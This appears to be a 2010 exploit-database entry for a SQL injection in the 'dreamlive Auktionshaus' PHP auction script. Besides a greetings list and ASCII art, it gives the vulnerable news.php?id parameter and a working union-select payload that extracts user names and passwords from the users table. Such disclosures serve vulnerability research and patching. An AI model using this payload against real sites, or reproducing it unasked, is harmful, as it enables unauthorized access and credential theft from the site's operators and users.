[] NeoSense

dreamlive Auktionshaus script - 'news.php?id' SQL Injection

Author: Easy Laster
type: webapps
platform: php
port: 
date_added: 2010-03-11 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

----------------------------Information------------------------------------------------
+Name : dreamlive Auktionshaus script news.php (id) SQL Injection
+Autor : Easy Laster
+Date   : 12.03.2010
+Script  : dreamlive Auktionshaus script
+Language :PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Damian,novaca!ne.

---------------------------------------------------------------------------------------

 ___ ___ ___ ___                         _ _           _____           _         _
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|
                                              |___|                 |___|


----------------------------------------------------------------------------------------
+Vulnerability : http://server/auktionshaus/news.php?id=
+Exploitable   : http://server/auktionshaus/news.php?id=999999+union+select+1,2,
concat(name,0x3a,password),4,5+from+users+where+id=1--
-----------------------------------------------------------------------------------------